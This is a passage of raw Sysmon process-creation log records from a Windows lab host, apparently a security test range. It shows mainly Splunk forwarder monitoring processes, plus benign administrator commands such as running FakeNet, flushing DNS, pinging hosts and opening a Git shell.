Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:17.126{A8622C2F-47A5-6078-0206-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:44.246{A8622C2F-4784-6078-0106-00000000AE01}6176C:\Windows\SysWOW64\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeipconfig /flushdnsC:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D99377A3CC218A71E27DFA4C6C4892A4,SHA256=5F2FF9DFA80DCBAE0301500B50F5BB10DDA257BE9C061B3CFCC9BA3C1FBC8891,IMPHASH=9CB4975E5FC345BA48C788102C18C1A6{A8622C2F-4783-6078-FF05-00000000AE01}6436C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" 154100x800000000000000030081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:43.138{A8622C2F-4783-6078-FF05-00000000AE01}6436C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe-----"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7DE393B4286292CF72FC087FA193771D,SHA256=489486CC2F68D1CDEC3A47A35EE7653CB1F13F8E7EB73C5FCD925F162FB92FCD,IMPHASH=6FAFEF2A4DE5987BE20D8FCCBBBCA571{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000030026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:23.323{A8622C2F-476F-6078-FE05-00000000AE01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:21.845{A8622C2F-476D-6078-FD05-00000000AE01}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030002Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:21.169{A8622C2F-476D-6078-FC05-00000000AE01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029992Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:20.298{A8622C2F-476C-6078-FB05-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:18.562{A8622C2F-476A-6078-FA05-00000000AE01}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029971Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:17.896{A8622C2F-4769-6078-F905-00000000AE01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029962Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:17.173{A8622C2F-4769-6078-F805-00000000AE01}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029858Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:23.326{A8622C2F-4733-6078-F605-00000000AE01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:21.750{A8622C2F-4731-6078-F505-00000000AE01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029834Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:21.179{A8622C2F-4731-6078-F405-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:20.285{A8622C2F-4730-6078-F305-00000000AE01}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029813Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:18.405{A8622C2F-472E-6078-F205-00000000AE01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:17.894{A8622C2F-472D-6078-F105-00000000AE01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029795Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:17.163{A8622C2F-472D-6078-F005-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:23.337{A8622C2F-46F7-6078-EF05-00000000AE01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029674Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:22.003{A8622C2F-46F6-6078-EE05-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:21.321{A8622C2F-46F5-6078-ED05-00000000AE01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:20.285{A8622C2F-46F4-6078-EC05-00000000AE01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029642Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:18.828{A8622C2F-46F2-6078-EB05-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029632Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:17.991{A8622C2F-46F1-6078-EA05-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:17.164{A8622C2F-46F1-6078-E905-00000000AE01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029597Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:12.770{A8622C2F-46EC-6078-E805-00000000AE01}6556C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping x.comC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000029544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:58.912{A8622C2F-46DE-6078-E705-00000000AE01}6412C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping google.comC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000029523Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:54.454{A8622C2F-46DA-6078-E605-00000000AE01}6212C:\Windows\System32\doskey.exe10.0.14393.0 (rs1_release.160715-1616)Keyboard History UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationDOSKEY.EXEdoskey git="C:\Program Files\Git\cmd\git.exe" $*C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=56BC572C8305144F4C498ABB7E8160A2,SHA256=DBF2E1E11FD57DD0FBB2ACCB08778E6D838F272B3D5E814260044F0B0866B5A1,IMPHASH=61FF284E1DB21B573CA96D1E4D227F1D{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000029514Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:54.444{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-46DA-6078-E305-00000000AE01}7012C:\Program Files\Git\git-cmd.exe"C:\Program Files\Git\git-cmd.exe" --cd-to-home 154100x800000000000000029473Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:54.359{A8622C2F-46DA-6078-E305-00000000AE01}7012C:\Program Files\Git\git-cmd.exe-Git for WindowsGitThe Git Development Communitygit.exe"C:\Program Files\Git\git-cmd.exe" --cd-to-homeC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=074A5973A6AD7B0FCD40831B00CA73BC,SHA256=F355A348123EB661704BAA5D30E3B37D5ADB0395EC33D7DA1A5CFEE3076EB3DF,IMPHASH=24812CA2A2E2DEB2BDB6B6C8878A2C71{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000029327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:36.910{A8622C2F-46C8-6078-E005-00000000AE01}5640C:\Windows\SysWOW64\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeipconfig /flushdnsC:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D99377A3CC218A71E27DFA4C6C4892A4,SHA256=5F2FF9DFA80DCBAE0301500B50F5BB10DDA257BE9C061B3CFCC9BA3C1FBC8891,IMPHASH=9CB4975E5FC345BA48C788102C18C1A6{A8622C2F-46C7-6078-DE05-00000000AE01}6456C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" 154100x800000000000000029213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:35.418{A8622C2F-46C7-6078-DE05-00000000AE01}6456C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe-----"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7DE393B4286292CF72FC087FA193771D,SHA256=489486CC2F68D1CDEC3A47A35EE7653CB1F13F8E7EB73C5FCD925F162FB92FCD,IMPHASH=6FAFEF2A4DE5987BE20D8FCCBBBCA571{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000029144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:23.326{A8622C2F-46BB-6078-DA05-00000000AE01}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:21.969{A8622C2F-46B9-6078-D905-00000000AE01}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029121Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:59:21.301{A8622C2F-46B9-6078-D805-00000000AE01}5448C:\Program 